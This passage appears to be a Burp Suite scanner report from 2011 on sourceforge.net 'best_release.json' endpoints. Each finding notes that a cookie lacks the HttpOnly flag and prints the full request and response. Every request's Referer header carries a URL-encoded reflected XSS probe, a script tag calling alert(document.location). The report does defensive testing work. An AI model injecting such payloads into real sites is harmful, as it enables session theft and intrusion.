Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:49 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=c0efdb05ea48e9f166f0a505d6f65cb11b82777agAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPHC3OVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 704
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "dc663183287af98ff5bdfb06182bd021", "bytes": 574840.0, "sf_file_id": 4568501, "filename": "/Automated MinGW I
...[SNIP]...

2.17. http://sourceforge.net/projects/mpc-hc/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/mpc-hc/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/mpc-hc/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:49 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:49 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=3ed94786af9f68661b2c5b60206831c460b8e9ebgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPE/2UVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 690
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "29ade19b14b7115a3196c80dac3d6a97", "bytes": 5135081.0, "sf_file_id": 3724875, "filename": "/MPC HomeCinema -
...[SNIP]...

2.18. http://sourceforge.net/projects/pdfcreator/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/pdfcreator/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/pdfcreator/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:47 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:47 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=984d5daadf626c1b3d601d13479058a5f43205e8gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BO8xdq1UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 673
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "4731b51bf253ef044c47c5525103c278", "bytes": 18386448.0, "sf_file_id": 4539313, "filename": "/PDFCreator/PDFC
...[SNIP]...

2.19. http://sourceforge.net/projects/pidgin/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/pidgin/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/pidgin/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:53 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:53 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=23d4f45260ac60ac3295f008dffac21f0b9cb2a0gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPUjYoVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 572
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "93e057ca8dd0095702b0cd76eb42a845", "bytes": 9627641.0, "sf_file_id": 4591577, "filename": "/Pidgin/2.8.0/pid
...[SNIP]...

2.20. http://sourceforge.net/projects/portableapps/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/portableapps/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/portableapps/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:52 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:52 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=8a3cd88d9f489822f7336b44c90f74f0f4e49065gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPSnbUVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 773
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "55846d3e60507b1577147db712361529", "bytes": 2206824.0, "sf_file_id": 3066256, "filename": "/PortableApps.com
...[SNIP]...

2.21. http://sourceforge.net/projects/sevenzip/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/sevenzip/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/sevenzip/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:46 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:46 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=c068c8b810ed6872444de25d2d959002da9ef6d4gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BO65uYVUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 556
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "441274c321383936860e845bd1eb4340", "bytes": 1138397.0, "sf_file_id": 4452910, "filename": "/7-Zip/9.22/7z922
...[SNIP]...

2.22. http://sourceforge.net/projects/stellarium/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/stellarium/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/stellarium/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:50 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:50 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=e6a36d2e1acbb30e01519e2ec079c936515c3f2bgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPK4651UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 618
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "8a60b39bdc6d2f458a8bd9d31af3d065", "bytes": 45607306.0, "sf_file_id": 3471338, "filename": "/Stellarium-win3
...[SNIP]...

2.23. http://sourceforge.net/projects/tortoisesvn/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/tortoisesvn/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/tortoisesvn/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:49 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:49 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=aa9616ed21644ff2132f43d6b0d6d8cd55c02a99gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPHZT41UOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 649
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "1074ba334b7b56a435979a0e71adc5e0", "bytes": 19894272.0, "sf_file_id": 4574356, "filename": "/1.6.16/Applicat
...[SNIP]...

2.24. http://sourceforge.net/projects/ubuntuzilla/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/ubuntuzilla/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/ubuntuzilla/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
Referer: http://sourceforge.net/search/?b9be1%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Eca7befe1b0c=1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ki_u=7aad15c2-51c6-f67c-06fc-28678630207a; VISITOR=4dfbfb5886502b7c30001429; sf.consume=37a091d9f552ebf0bfda2ea42c67701065e9bdadgAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB037/ItRLAlUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; ki_t=1308359528446%3B1308359528446%3B1308359822282%3B1%3B2; PHPSESSID=bd9f0761421992242366debfeaf5b134; __utmz=191645736.1308361961.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/10; __utma=191645736.453693884.1308359518.1308359518.1308361961.2; __utmb=191645736.1.10.1308361961; __utmc=191645736

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Sat, 18 Jun 2011 01:52:49 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Pragma: no-cache
Cache-Control: no-cache
X-UA-Compatible: IE=edge,chrome=1
Set-Cookie: VISITOR=4dfbfb5886502b7c30001429; expires="Tue, 15-Jun-2021 01:52:49 GMT"; httponly; Max-Age=315360000; Path=/
Set-cookie: sf.consume=29198b370fed616f3137f60f909d4c65cc52a9f1gAJ9cQEoVQhfZXhwaXJlc3ECY2RhdGV0aW1lCmRhdGV0aW1lCnEDVQoH9gETAw4HAAAAhVJxBFUDX2lkcQVVIDZhMmMxMDllMWJkNWExMWM1NWU3Yjg0NTM4NDg4MzFkcQZVDnVzZXNfcmVsYXRpb25zcQeJVQd2ZXJzaW9ucQhVATJVA2tleXEJVRg0ZGZiZmI1ODg2NTAyYjdjMzAwMDE0MjlxClUFcHJlZnNxC31xDFUOX2FjY2Vzc2VkX3RpbWVxDUdB038BPEVX2lUOX2NyZWF0aW9uX3RpbWVxDkdB037+1hvrt3Uu; expires=Tue, 19-Jan-2038 03:14:07 GMT; Path=/
Content-Length: 607
Access-Control-Allow-Origin: *

{"release": {"sf_release_id": null, "release_notes_url": null, "file_type": "f", "md5sum": "aef8e5ae77c7d7da5fed5509caf190c6", "bytes": 193.0, "sf_file_id": 2836630, "filename": "/ubuntuzilla_instruct
...[SNIP]...

2.25. http://sourceforge.net/projects/ultrastardx/best_release.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /projects/ultrastardx/best_release.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /projects/ultrastardx/best_release.json HTTP/1.1
Host: sourceforge.net
Proxy-Connection: keep-alive
